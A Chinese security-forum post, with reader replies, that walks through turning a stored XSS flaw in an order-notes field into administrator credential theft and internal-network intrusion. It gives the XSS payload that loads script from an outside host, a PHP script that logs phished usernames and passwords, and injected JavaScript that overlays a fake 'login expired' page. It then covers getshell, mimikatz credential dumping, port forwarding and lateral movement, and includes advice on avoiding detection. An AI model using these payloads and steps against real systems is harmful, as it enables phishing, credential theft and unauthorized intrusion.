用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    28

    主题

    271

    帖子

    1424

    魔法币
    收听
    0
    粉丝
    85
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-9-21 09:00:46 44220647

    前言

    渗透过程中,有时候遇某些网站,明明检测到有xss漏洞,但是盲打以后,收到的cookie还是不能登录后台,大多数的原因都是因为对方的cookie关键参数开启了httponly,导致你获取到的cookie参数不全,所以没法登录。

    今天和大家分享一次绕过httponly拿后台的思路。

    0x01 遇到一个存在xss的站点

    这个站点在提交订单的时候,下面有个订单备注输入框存在存储型xss。
    我们直接插入插入xss代码;

    </textarea>'"><script src=https://xx.cc/x/7Zbi58></script>

    过了没多久拿到了cookie

    但是我们尝试用cookie登录的时候失败了。

    那么问题来了,如何才能拿到后台呢?

    0x02 xss钓鱼拿下后台

    因为xss平台已经收到后台的url地址了。
    那么我们直接访问这个后台地址,然后右键查看源代码。

    然后把所有代码复制到我们新建的一个html文件里面。
    修改里面的代码,把所有相对路径的地方,全部改成绝对路径,(啥意思呢?请看下面分析。)

    比如里面有的链接是这样的 /index.php
    我们要修改成被钓鱼的域名加上/index.php
    改完后应该是这样的 http://被钓鱼的域名.com/index.php

    注意:所有相对路径链接部分都要改。

    然后我们把action=这里修改成我们的1.php文件地址(源码在下面)
    <form action="http://www.我们的php域名.com/1.php" method="post" class="login-form">

    1.php源码如下

    <?php 
    $str=''; 
    $str.='name:'.$_POST['name'].'|'; 
    $str.='pwd:'.$_POST['pwd'].'|'; 
    $str.='ip:'.$_SERVER["REMOTE_ADDR"].'|'; 
    $str.='time:'.date("m-d-h:i"); 
    file_put_contents('log.txt',$str.PHP_EOL, FILE_APPEND); 
    #下面这行的意思是记录完账号密码以后跳转到他原来的后台地址。
    header("location:https://www.baidu.com/admin.php");
    ?> 

    注意:你的html文件里面的用户名和密码的参数名称要对应1.php的修改。
    name=的这里,要和1.php的对应,要不然接收不到账号密码。

    1.php的后面添加上被钓鱼方的后台首页地址,成功拿到密码以后会自动跳回他后台首页。

    接下来我们把这个html文件和1.php放到网站空间,直接phpstudy搭建一个也可以的。

    现在去xss平台新建一个项目
    名称什么的随便输入,在自定义代码处输入以下代码。
    把其中的url地址修改成你的html地址。

    setTimeout(function(){
    alert("登陆过期,请重新登陆!");
    parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"https:\/\/我的钓鱼域名.com/index.html\" frameBorder=0 scrolling=no></iframe>");
    setTimeout(function(){
    document.getElementsByTagName("body")[0].setAttribute("style","margin:2px;");},100);
    setTimeout(function(){
    parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100);
    },1500);

    我们把得到的xss地址复制下来,插入到订单备注里面。
    管理员看到我们的订单以后,1.5秒后就会自动弹出“登录过期,请重新登陆”的提示,并在url不改变的情况下,跳转到我们伪造的登录页面上去了。

    接下来只要管理员输入了账号密码,并且提交,那么我们钓鱼服务器就收到账号密码啦,管理员那边也正常跳转到他的后台。

    注意:拿到账号密码以后请迅速删掉你的xss项目,要不然管理员那边每一次浏览你的订单都会跳出这个登录页面,避免被发现。
    另外实际操作的时候,你可以修改下代码,比如判断是否登录成功,或者修改延时等等,我这只是提供一个思路,抛砖引玉吧。

    然后我们用拿到的账号密码登录后台,找上传点getshell。

    拿到shell以后我们用 mimikatz(咪咪卡住)获取管理员密码。
    然后通过ipconfig看到对方服务器在内网,所以我们需要转发端口出来,这里方法很多了,lcx转发 ngrok等等都可以的。

    转发出来我们用获取到的密码直接登录服务器。
    先收集一波内网信息。

    net view 列出工作组下的计算机名称。
    arp -a 查看arp缓存表。

    然后就是横向怼了。

    附上钓鱼的演示源码
    链接: https://pan.baidu.com/s/1VrvYXLy4ozXN-8iR7Uj7rA 提取码: giu3


    ∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷ 华丽的分割线 ∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷


    以上都不是重点,重点是我要放出自己用了多年的【渗透工具包】啦。
    里面的很多工具都是一点点收集来的,因为都是来源于互联网,部分工具可能存在后门,请大家下载以后自行查杀,部分批量的工具过于敏感就不放出来啦。

    声明:

    工具是一把刀,既能切菜,也能伤人,我分享的初衷是便于大家做授权的渗透测试,所以请不要用于非法用途,否则一切后果自负。



    渗透工具包下载地址

    下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。


    游客,如果您要查看本帖隐藏内容请回复






    评分

    参与人数 1魔法币 +10 收起 理由
    zzconfig + 10 强势前排

    查看全部评分

    RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]
    使用道具 举报 回复
    发表于 2018-10-11 17:09:14
    一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]
    使用道具 举报 回复
    一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]RE: 一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】 [修改]
    使用道具 举报 回复
    下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。
    使用道具 举报 回复
    下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。
    使用道具 举报 回复

    下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。
    使用道具 举报 回复
    下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。
    使用道具 举报 回复
    下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。下载地址和解压密码回复可见,工具包最好用7-zip解压,避免出现不必要的问题。
    使用道具 举报 回复
    发表于 2018-9-21 09:11:08
    学习学习学习
    使用道具 举报 回复
    发表于 2018-9-21 09:18:11
    我有姿势我自豪,学姿势学姿势
    使用道具 举报 回复
    膜拜一下大佬
    使用道具 举报 回复
    发表于 2018-9-21 09:29:49
    ++++++++++++++++++++++
    使用道具 举报 回复
    发表于 2018-9-21 09:32:04

    学习学习学习
    使用道具 举报 回复
    发表于 2018-9-21 09:42:45
    来看看   
    使用道具 举报 回复
    发表于 2018-9-21 09:47:17
    大佬牛逼
    使用道具 举报 回复
    发表于 2018-9-21 10:09:21
    666666666666666666666
    使用道具 举报 回复
    发表于 2018-9-21 10:09:29
    这个真心干货!
    使用道具 举报 回复
    谢谢楼主分享。。。。
    使用道具 举报 回复
    发表于 2018-9-21 10:13:33
    谢谢分享
    使用道具 举报 回复
    发表于 2018-9-21 10:14:04
    渗透工具包下载地址
    使用道具 举报 回复
    发表于 2018-9-21 10:18:24
    3333333333333
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册